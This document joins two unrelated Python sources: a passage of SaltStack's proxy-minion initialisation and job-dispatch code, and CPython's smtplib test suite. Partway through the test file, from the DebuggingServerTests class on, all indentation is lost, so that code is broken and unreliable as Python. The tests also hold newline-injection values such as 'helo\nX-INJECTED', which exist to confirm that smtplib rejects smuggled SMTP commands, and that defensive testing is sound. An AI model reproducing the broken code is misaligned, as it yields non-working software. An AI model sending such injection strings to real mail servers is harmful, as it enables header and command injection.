            self.opts['pillar'] = yield salt.pillar.get_async_pillar(
                self.opts,
                self.opts['grains'],
                self.opts['id'],
                saltenv=self.opts['saltenv'],
                pillarenv=self.opts.get('pillarenv'),
            ).compile_pillar()
        # The proxy config MUST come from pillar or opts; abort otherwise
        if 'proxy' not in self.opts['pillar'] and 'proxy' not in self.opts:
            errmsg = 'No proxy key found in pillar or opts for id ' + self.opts['id'] + '. ' + \
                'Check your pillar/opts configuration and contents. Salt-proxy aborted.'
            log.error(errmsg)
            self._running = False
            raise SaltSystemExit(code=-1, msg=errmsg)
        if 'proxy' not in self.opts:
            self.opts['proxy'] = self.opts['pillar']['proxy']
        if self.opts.get('proxy_merge_pillar_in_opts'):
            # Override proxy opts with pillar data when the user required.
            self.opts = salt.utils.dictupdate.merge(self.opts,
                                                    self.opts['pillar'],
                                                    strategy=self.opts.get('proxy_merge_pillar_in_opts_strategy'),
                                                    merge_lists=self.opts.get('proxy_deep_merge_pillar_in_opts', False))
        elif self.opts.get('proxy_mines_pillar'):
            # Even when not required, some details such as mine configuration
            # should be merged anyway whenever possible.
            if 'mine_interval' in self.opts['pillar']:
                self.opts['mine_interval'] = self.opts['pillar']['mine_interval']
            if 'mine_functions' in self.opts['pillar']:
                general_proxy_mines = self.opts.get('mine_functions', [])
                specific_proxy_mines = self.opts['pillar']['mine_functions']
                try:
                    self.opts['mine_functions'] = general_proxy_mines + specific_proxy_mines
                except TypeError:
                    # FIX: use lazy %-style logging (previous code eagerly
                    # str.format()-ed the message and bound an unused 'terr')
                    log.error('Unable to merge mine functions from the pillar in the opts, for proxy %s',
                              self.opts['id'])
        fq_proxyname = self.opts['proxy']['proxytype']
        # Need to load the modules so they get all the dunder variables
        self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
        # we can then sync any proxymodules down from the master
        # we do a sync_all here in case proxy code was installed by
        # SPM or was manually placed in /srv/salt/_modules etc.
        self.functions['saltutil.sync_all'](saltenv=self.opts['saltenv'])
        # Pull in the utils
        self.utils = salt.loader.utils(self.opts)
        # Then load the proxy module
        self.proxy = salt.loader.proxy(self.opts, utils=self.utils)
        # And re-load the modules so the __proxy__ variable gets injected
        self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
        self.functions.pack['__proxy__'] = self.proxy
        self.proxy.pack['__salt__'] = self.functions
        self.proxy.pack['__ret__'] = self.returners
        self.proxy.pack['__pillar__'] = self.opts['pillar']
        # Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__
        self.utils = salt.loader.utils(self.opts, proxy=self.proxy)
        self.proxy.pack['__utils__'] = self.utils
        # Reload all modules so all dunder variables are injected
        self.proxy.reload_modules()
        # Start engines here instead of in the Minion superclass __init__
        # This is because we need to inject the __proxy__ variable but
        # it is not setup until now.
        self.io_loop.spawn_callback(salt.engines.start_engines, self.opts,
                                    self.process_manager, proxy=self.proxy)
        # A usable proxymodule must expose both init() and shutdown()
        if ('{0}.init'.format(fq_proxyname) not in self.proxy
                or '{0}.shutdown'.format(fq_proxyname) not in self.proxy):
            errmsg = 'Proxymodule {0} is missing an init() or a shutdown() or both. '.format(fq_proxyname) + \
                'Check your proxymodule. Salt-proxy aborted.'
            log.error(errmsg)
            self._running = False
            raise SaltSystemExit(code=-1, msg=errmsg)
        proxy_init_fn = self.proxy[fq_proxyname + '.init']
        proxy_init_fn(self.opts)
        # Grains may depend on the connected device, so load them via the proxy
        self.opts['grains'] = salt.loader.grains(self.opts, proxy=self.proxy)
        self.serial = salt.payload.Serial(self.opts)
        self.mod_opts = self._prep_mod_opts()
        self.matcher = Matcher(self.opts, self.functions)
        self.beacons = salt.beacons.Beacon(self.opts, self.functions)
        uid = salt.utils.user.get_uid(user=self.opts.get('user', None))
        self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
        if self.connected and self.opts['pillar']:
            # The pillar has changed due to the connection to the master.
            # Reload the functions so that they can use the new pillar data.
            self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
            if hasattr(self, 'schedule'):
                self.schedule.functions = self.functions
                self.schedule.returners = self.returners
        if not hasattr(self, 'schedule'):
            self.schedule = salt.utils.schedule.Schedule(
                self.opts,
                self.functions,
                self.returners,
                cleanup=[master_event(type='alive')],
                proxy=self.proxy)
        # add default scheduling jobs to the minions scheduler
        if self.opts['mine_enabled'] and 'mine.update' in self.functions:
            self.schedule.add_job({
                '__mine_interval':
                {
                    'function': 'mine.update',
                    'minutes': self.opts['mine_interval'],
                    'jid_include': True,
                    'maxrunning': 2,
                    'return_job': self.opts.get('mine_return_job', False)
                }
            }, persist=True)
            log.info('Added mine.update to scheduler')
        else:
            self.schedule.delete_job('__mine_interval', persist=True)
        # add master_alive job if enabled
        if (self.opts['transport'] != 'tcp' and
                self.opts['master_alive_interval'] > 0):
            self.schedule.add_job({
                master_event(type='alive', master=self.opts['master']):
                {
                    'function': 'status.master',
                    'seconds': self.opts['master_alive_interval'],
                    'jid_include': True,
                    'maxrunning': 1,
                    'return_job': False,
                    'kwargs': {'master': self.opts['master'],
                               'connected': True}
                }
            }, persist=True)
            # Schedule a failback ping only when we are not already on the
            # primary master of the configured master_list
            if self.opts['master_failback'] and \
                    'master_list' in self.opts and \
                    self.opts['master'] != self.opts['master_list'][0]:
                self.schedule.add_job({
                    master_event(type='failback'):
                    {
                        'function': 'status.ping_master',
                        'seconds': self.opts['master_failback_interval'],
                        'jid_include': True,
                        'maxrunning': 1,
                        'return_job': False,
                        'kwargs': {'master': self.opts['master_list'][0]}
                    }
                }, persist=True)
            else:
                self.schedule.delete_job(master_event(type='failback'), persist=True)
        else:
            self.schedule.delete_job(master_event(type='alive', master=self.opts['master']), persist=True)
            self.schedule.delete_job(master_event(type='failback'), persist=True)
        # proxy keepalive
        proxy_alive_fn = fq_proxyname+'.alive'
        if (proxy_alive_fn in self.proxy
            and 'status.proxy_reconnect' in self.functions
                and self.opts.get('proxy_keep_alive', True)):
            # proxy_keep_alive defaults to True; periodically check the
            # connection and reconnect when the device dropped it
            self.schedule.add_job({
                '__proxy_keepalive':
                {
                    'function': 'status.proxy_reconnect',
                    'minutes': self.opts.get('proxy_keep_alive_interval', 1),  # by default, check once per minute
                    'jid_include': True,
                    'maxrunning': 1,
                    'return_job': False,
                    'kwargs': {
                        'proxy_name': fq_proxyname
                    }
                }
            }, persist=True)
            self.schedule.enable_schedule()
        else:
            self.schedule.delete_job('__proxy_keepalive', persist=True)
        # Sync the grains here so the proxy can communicate them to the master
        self.functions['saltutil.sync_grains'](saltenv='base')
        self.grains_cache = self.opts['grains']
        self.ready = True

    @classmethod
    def _target(cls, minion_instance, opts, data, connected):
        '''
        Entry point run in the worker process/thread for a published job.

        Lazily constructs and fully wires a ProxyMinion (modules, proxy
        module, dunder packing) when no instance was handed in, then
        dispatches the job to the regular Minion return handlers.
        '''
        if not minion_instance:
            minion_instance = cls(opts)
            minion_instance.connected = connected
            if not hasattr(minion_instance, 'functions'):
                # Need to load the modules so they get all the dunder variables
                functions, returners, function_errors, executors = (
                    minion_instance._load_modules(grains=opts['grains'])
                )
                minion_instance.functions = functions
                minion_instance.returners = returners
                minion_instance.function_errors = function_errors
                minion_instance.executors = executors
                # Pull in the utils
                minion_instance.utils = salt.loader.utils(minion_instance.opts)
                # Then load the proxy module
                minion_instance.proxy = salt.loader.proxy(minion_instance.opts, utils=minion_instance.utils)
                # And re-load the modules so the __proxy__ variable gets injected
                functions, returners, function_errors, executors = (
                    minion_instance._load_modules(grains=opts['grains'])
                )
                minion_instance.functions = functions
                minion_instance.returners = returners
                minion_instance.function_errors = function_errors
                minion_instance.executors = executors
                minion_instance.functions.pack['__proxy__'] = minion_instance.proxy
                minion_instance.proxy.pack['__salt__'] = minion_instance.functions
                minion_instance.proxy.pack['__ret__'] = minion_instance.returners
                minion_instance.proxy.pack['__pillar__'] = minion_instance.opts['pillar']
                # Reload utils as well (chicken and egg, __utils__ needs __proxy__ and __proxy__ needs __utils__
                minion_instance.utils = salt.loader.utils(minion_instance.opts, proxy=minion_instance.proxy)
                minion_instance.proxy.pack['__utils__'] = minion_instance.utils
                # Reload all modules so all dunder variables are injected
                minion_instance.proxy.reload_modules()
                fq_proxyname = opts['proxy']['proxytype']
                proxy_init_fn = minion_instance.proxy[fq_proxyname + '.init']
                proxy_init_fn(opts)
            if not hasattr(minion_instance, 'serial'):
                minion_instance.serial = salt.payload.Serial(opts)
            if not hasattr(minion_instance, 'proc_dir'):
                uid = salt.utils.user.get_uid(user=opts.get('user', None))
                minion_instance.proc_dir = (
                    get_proc_dir(opts['cachedir'], uid=uid)
                )
        with tornado.stack_context.StackContext(minion_instance.ctx):
            # Multi-function jobs carry a tuple/list of function names
            if isinstance(data['fun'], tuple) or isinstance(data['fun'], list):
                Minion._thread_multi_return(minion_instance, opts, data)
            else:
                Minion._thread_return(minion_instance, opts, data)
|
test_smtplib.py
|
import asyncore
import base64
import email.mime.text
from email.message import EmailMessage
from email.base64mime import body_encode as encode_base64
import email.utils
import hashlib
import hmac
import socket
import smtpd
import smtplib
import io
import re
import sys
import time
import select
import errno
import textwrap
import threading
import unittest
from test import support, mock_socket
from test.support import hashlib_helper
from test.support import socket_helper
from test.support import threading_setup, threading_cleanup, join_thread
from unittest.mock import Mock
# Loopback host the test SMTP servers bind to (from test.support.socket_helper)
HOST = socket_helper.HOST

if sys.platform == 'darwin':
    # select.poll returns a select.POLLHUP at the end of the tests
    # on darwin, so just ignore it
    def handle_expt(self):
        pass
    smtpd.SMTPChannel.handle_expt = handle_expt
def server(evt, buf, serv):
    """Accept one connection on *serv* and drip-feed *buf* to it.

    *evt* is set once when the server is listening and again when it has
    shut down, so the client side can synchronize with both moments.
    """
    serv.listen()
    evt.set()
    try:
        conn, addr = serv.accept()
    except socket.timeout:
        # No client showed up in time; just shut down below.
        pass
    else:
        # Bound the send loop so a stuck client cannot hang the test forever.
        rounds = 500
        while buf and rounds > 0:
            _, writable, _ = select.select([], [conn], [])
            if writable:
                nsent = conn.send(buf)
                buf = buf[nsent:]
            rounds -= 1
        conn.close()
    finally:
        serv.close()
        evt.set()
class GeneralTests:
    '''
    Client-construction tests run against a mocked socket module (no real
    network).  Subclasses supply the ``client`` attribute (SMTP or LMTP).
    '''

    def setUp(self):
        # Route the client's socket calls through the mock module
        smtplib.socket = mock_socket
        self.port = 25

    def tearDown(self):
        # Restore the real socket module
        smtplib.socket = socket

    # This method is no longer used but is retained for backward compatibility,
    # so test to make sure it still works.
    def testQuoteData(self):
        teststr = "abc\n.jkl\rfoo\r\n..blue"
        expected = "abc\r\n..jkl\r\nfoo\r\n...blue"
        self.assertEqual(expected, smtplib.quotedata(teststr))

    def testBasic1(self):
        mock_socket.reply_with(b"220 Hola mundo")
        # connects
        client = self.client(HOST, self.port)
        client.close()

    def testSourceAddress(self):
        mock_socket.reply_with(b"220 Hola mundo")
        # connects
        client = self.client(HOST, self.port,
                             source_address=('127.0.0.1', 19876))
        self.assertEqual(client.source_address, ('127.0.0.1', 19876))
        client.close()

    def testBasic2(self):
        mock_socket.reply_with(b"220 Hola mundo")
        # connects, include port in host name
        client = self.client("%s:%s" % (HOST, self.port))
        client.close()

    def testLocalHostName(self):
        mock_socket.reply_with(b"220 Hola mundo")
        # check that supplied local_hostname is used
        client = self.client(HOST, self.port, local_hostname="testhost")
        self.assertEqual(client.local_hostname, "testhost")
        client.close()

    def testTimeoutDefault(self):
        mock_socket.reply_with(b"220 Hola mundo")
        self.assertIsNone(mock_socket.getdefaulttimeout())
        mock_socket.setdefaulttimeout(30)
        self.assertEqual(mock_socket.getdefaulttimeout(), 30)
        try:
            client = self.client(HOST, self.port)
        finally:
            # Always undo the global default timeout, even on failure
            mock_socket.setdefaulttimeout(None)
        self.assertEqual(client.sock.gettimeout(), 30)
        client.close()

    def testTimeoutNone(self):
        mock_socket.reply_with(b"220 Hola mundo")
        self.assertIsNone(socket.getdefaulttimeout())
        socket.setdefaulttimeout(30)
        try:
            # timeout=None must override the global default timeout
            client = self.client(HOST, self.port, timeout=None)
        finally:
            socket.setdefaulttimeout(None)
        self.assertIsNone(client.sock.gettimeout())
        client.close()

    def testTimeoutZero(self):
        mock_socket.reply_with(b"220 Hola mundo")
        # A zero timeout (non-blocking socket) is rejected outright
        with self.assertRaises(ValueError):
            self.client(HOST, self.port, timeout=0)

    def testTimeoutValue(self):
        mock_socket.reply_with(b"220 Hola mundo")
        client = self.client(HOST, self.port, timeout=30)
        self.assertEqual(client.sock.gettimeout(), 30)
        client.close()

    def test_debuglevel(self):
        mock_socket.reply_with(b"220 Hello world")
        client = self.client()
        client.set_debuglevel(1)
        with support.captured_stderr() as stderr:
            client.connect(HOST, self.port)
        client.close()
        # level 1: plain "connect:" lines on stderr
        expected = re.compile(r"^connect:", re.MULTILINE)
        self.assertRegex(stderr.getvalue(), expected)

    def test_debuglevel_2(self):
        mock_socket.reply_with(b"220 Hello world")
        client = self.client()
        client.set_debuglevel(2)
        with support.captured_stderr() as stderr:
            client.connect(HOST, self.port)
        client.close()
        # level 2: each line is prefixed with a HH:MM:SS.ffffff timestamp
        expected = re.compile(r"^\d{2}:\d{2}:\d{2}\.\d{6} connect: ",
                              re.MULTILINE)
        self.assertRegex(stderr.getvalue(), expected)
class SMTPGeneralTests(GeneralTests, unittest.TestCase):
    '''Run the shared GeneralTests against the plain SMTP client.'''

    client = smtplib.SMTP
class LMTPGeneralTests(GeneralTests, unittest.TestCase):
    '''Run the shared GeneralTests against the LMTP client, plus the
    Unix-domain-socket cases LMTP additionally supports.'''

    client = smtplib.LMTP

    @unittest.skipUnless(hasattr(socket, 'AF_UNIX'), "test requires Unix domain socket")
    def testUnixDomainSocketTimeoutDefault(self):
        # A host starting with '/' selects an AF_UNIX connection
        local_host = '/some/local/lmtp/delivery/program'
        mock_socket.reply_with(b"220 Hello world")
        try:
            client = self.client(local_host, self.port)
        finally:
            mock_socket.setdefaulttimeout(None)
        # Unix-socket connections ignore the default timeout
        self.assertIsNone(client.sock.gettimeout())
        client.close()

    def testTimeoutZero(self):
        # Re-check the inherited TCP case, then the Unix-socket path
        super().testTimeoutZero()
        local_host = '/some/local/lmtp/delivery/program'
        with self.assertRaises(ValueError):
            self.client(local_host, timeout=0)
# Test server thread using the specified SMTP server class
def debugging_server(serv, serv_evt, client_evt):
    '''
    Drive *serv* (an asyncore-based SMTP server) until the client signals
    completion via *client_evt* or a bounded number of poll iterations runs
    out.  *serv_evt* is set on startup and again on shutdown.
    '''
    serv_evt.set()
    try:
        # poll2 (which uses select.poll) is preferred when available
        if hasattr(select, 'poll'):
            poll_fun = asyncore.poll2
        else:
            poll_fun = asyncore.poll
        # Bound the loop so a wedged client cannot hang the test forever
        n = 1000
        while asyncore.socket_map and n > 0:
            poll_fun(0.01, asyncore.socket_map)
            # when the client conversation is finished, it will
            # set client_evt, and it's then ok to kill the server
            if client_evt.is_set():
                serv.close()
                break
            n -= 1
    except socket.timeout:
        pass
    finally:
        if not client_evt.is_set():
            # allow some time for the client to read the result
            time.sleep(0.5)
        serv.close()
        asyncore.close_all()
        serv_evt.set()
# Markers that smtpd.DebuggingServer prints around each received message;
# the tests below use them to slice the captured stdout.
MSG_BEGIN = '---------- MESSAGE FOLLOWS ----------\n'
MSG_END = '------------ END MESSAGE ------------\n'

# NOTE: Some SMTP objects in the tests below are created with a non-default
# local_hostname argument to the constructor, since (on some systems) the FQDN
# lookup caused by the default local_hostname sometimes takes so long that the
# test server times out, causing the test to fail.

# Test behavior of smtpd.DebuggingServer
class DebuggingServerTests(unittest.TestCase):
maxDiff = None
def setUp(self):
    '''
    Start a smtpd.DebuggingServer on an ephemeral loopback port in a
    background thread and capture everything it prints on stdout.
    '''
    self.thread_key = threading_setup()
    # Avoid a (possibly slow) real FQDN lookup during the tests
    self.real_getfqdn = socket.getfqdn
    socket.getfqdn = mock_socket.getfqdn
    # temporarily replace sys.stdout to capture DebuggingServer output
    self.old_stdout = sys.stdout
    self.output = io.StringIO()
    sys.stdout = self.output
    self.serv_evt = threading.Event()
    self.client_evt = threading.Event()
    # Capture SMTPChannel debug output
    self.old_DEBUGSTREAM = smtpd.DEBUGSTREAM
    smtpd.DEBUGSTREAM = io.StringIO()
    # Pick a random unused port by passing 0 for the port number
    self.serv = smtpd.DebuggingServer((HOST, 0), ('nowhere', -1),
                                      decode_data=True)
    # Keep a note of what server host and port were assigned
    self.host, self.port = self.serv.socket.getsockname()[:2]
    serv_args = (self.serv, self.serv_evt, self.client_evt)
    self.thread = threading.Thread(target=debugging_server, args=serv_args)
    self.thread.start()
    # wait until server thread has assigned a port number
    self.serv_evt.wait()
    self.serv_evt.clear()
def tearDown(self):
    '''Shut the server thread down and undo all global monkeypatching.'''
    socket.getfqdn = self.real_getfqdn
    # indicate that the client is finished
    self.client_evt.set()
    # wait for the server thread to terminate
    self.serv_evt.wait()
    join_thread(self.thread)
    # restore sys.stdout
    sys.stdout = self.old_stdout
    # restore DEBUGSTREAM
    smtpd.DEBUGSTREAM.close()
    smtpd.DEBUGSTREAM = self.old_DEBUGSTREAM
    del self.thread
    self.doCleanups()
    threading_cleanup(*self.thread_key)
def get_output_without_xpeer(self):
test_output = self.output.getvalue()
return re.sub(r'(.*?)^X-Peer:\s*\S+\n(.*)', r'\1\2',
test_output, flags=re.MULTILINE|re.DOTALL)
def testBasic(self):
# connect
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
smtp.quit()
def testSourceAddress(self):
# connect
src_port = socket_helper.find_unused_port()
try:
smtp = smtplib.SMTP(self.host, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT,
source_address=(self.host, src_port))
self.addCleanup(smtp.close)
self.assertEqual(smtp.source_address, (self.host, src_port))
self.assertEqual(smtp.local_hostname, 'localhost')
smtp.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to source port %d" % src_port)
raise
def testNOOP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'OK')
self.assertEqual(smtp.noop(), expected)
smtp.quit()
def testRSET(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'OK')
self.assertEqual(smtp.rset(), expected)
smtp.quit()
def testELHO(self):
# EHLO isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (250, b'\nSIZE 33554432\nHELP')
self.assertEqual(smtp.ehlo(), expected)
smtp.quit()
def testEXPNNotImplemented(self):
# EXPN isn't implemented in DebuggingServer
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (502, b'EXPN not implemented')
smtp.putcmd('EXPN')
self.assertEqual(smtp.getreply(), expected)
smtp.quit()
def test_issue43124_putcmd_escapes_newline(self):
# see: https://bugs.python.org/issue43124
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
with self.assertRaises(ValueError) as exc:
smtp.putcmd('helo\nX-INJECTED')
self.assertIn("prohibited newline characters", str(exc.exception))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
expected = (252, b'Cannot VRFY user, but will accept message ' + \
b'and attempt delivery')
self.assertEqual(smtp.vrfy('nobody@nowhere.com'), expected)
self.assertEqual(smtp.verify('nobody@nowhere.com'), expected)
smtp.quit()
def testSecondHELO(self):
# check that a second HELO returns a message that it's a duplicate
# (this behavior is specific to smtpd.SMTPChannel)
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.helo()
expected = (503, b'Duplicate HELO/EHLO')
self.assertEqual(smtp.helo(), expected)
smtp.quit()
def testHELP(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
self.assertEqual(smtp.help(), b'Supported commands: EHLO HELO MAIL ' + \
b'RCPT DATA RSET NOOP QUIT VRFY')
smtp.quit()
def testSend(self):
# connect and send mail
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX(nnorwitz): this test is flaky and dies with a bad file descriptor
# in asyncore. This sleep might help, but should really be fixed
# properly by using an Event variable.
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendBinary(self):
m = b'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.decode('ascii'), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def testSendNeedingDotQuote(self):
# Issue 12283
m = '.A test\n.mes.sage.'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('John', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
def test_issue43124_escape_localhostname(self):
# see: https://bugs.python.org/issue43124
# connect and send mail
m = 'wazzuuup\nlinetwo'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='hi\nX-INJECTED',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
with self.assertRaises(ValueError) as exc:
smtp.sendmail("hi@me.com", "you@me.com", m)
self.assertIn(
"prohibited newline characters: ehlo hi\\nX-INJECTED",
str(exc.exception),
)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
debugout = smtpd.DEBUGSTREAM.getvalue()
self.assertNotIn("X-INJECTED", debugout)
def test_issue43124_escape_options(self):
# see: https://bugs.python.org/issue43124
# connect and send mail
m = 'wazzuuup\nlinetwo'
smtp = smtplib.SMTP(
HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail("hi@me.com", "you@me.com", m)
with self.assertRaises(ValueError) as exc:
smtp.mail("hi@me.com", ["X-OPTION\nX-INJECTED-1", "X-OPTION2\nX-INJECTED-2"])
msg = str(exc.exception)
self.assertIn("prohibited newline characters", msg)
self.assertIn("X-OPTION\\nX-INJECTED-1 X-OPTION2\\nX-INJECTED-2", msg)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
debugout = smtpd.DEBUGSTREAM.getvalue()
self.assertNotIn("X-OPTION", debugout)
self.assertNotIn("X-OPTION2", debugout)
self.assertNotIn("X-INJECTED-1", debugout)
self.assertNotIn("X-INJECTED-2", debugout)
def testSendNullSender(self):
m = 'A test message'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.sendmail('<>', 'Sally', m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
mexpect = '%s%s\n%s' % (MSG_BEGIN, m, MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: <>$", re.MULTILINE)
self.assertRegex(debugout, sender)
def testSendMessage(self):
m = email.mime.text.MIMEText('A test message')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m, from_addr='John', to_addrs='Sally')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds as figuring out
# exactly what IP address format is put there is not easy (and
# irrelevant to our test). Typically 127.0.0.1 or ::1, but it is
# not always the same as socket.gethostbyname(HOST). :(
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
def testSendMessageWithAddresses(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
# make sure the Bcc header is still in the message.
self.assertEqual(m['Bcc'], 'John Root <root@localhost>, "Dinsdale" '
'<warped@silly.walks.com>')
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
# The Bcc header should not be transmitted.
del m['Bcc']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Sally', 'Fred', 'root@localhost',
'warped@silly.walks.com'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSomeAddresses(self):
# Make sure nothing breaks if not all of the three 'to' headers exist
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: foo@bar.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageWithSpecifiedAddresses(self):
# Make sure addresses specified in call override those in message.
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m, from_addr='joe@example.com', to_addrs='foo@example.net')
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: joe@example.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertNotRegex(debugout, to_addr)
recip = re.compile(r"^recips: .*'foo@example.net'.*$", re.MULTILINE)
self.assertRegex(debugout, recip)
def testSendMessageWithMultipleFrom(self):
# Sender overrides To
m = email.mime.text.MIMEText('A test message')
m['From'] = 'Bernard, Bianca'
m['Sender'] = 'the_rescuers@Rescue-Aid-Society.com'
m['To'] = 'John, Dinsdale'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(smtp.close)
smtp.send_message(m)
# XXX (see comment in testSend)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
# Remove the X-Peer header that DebuggingServer adds.
test_output = self.get_output_without_xpeer()
del m['X-Peer']
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(test_output, mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile("^sender: the_rescuers@Rescue-Aid-Society.com$", re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile(r"^recips: .*'{}'.*$".format(addr),
re.MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageResent(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
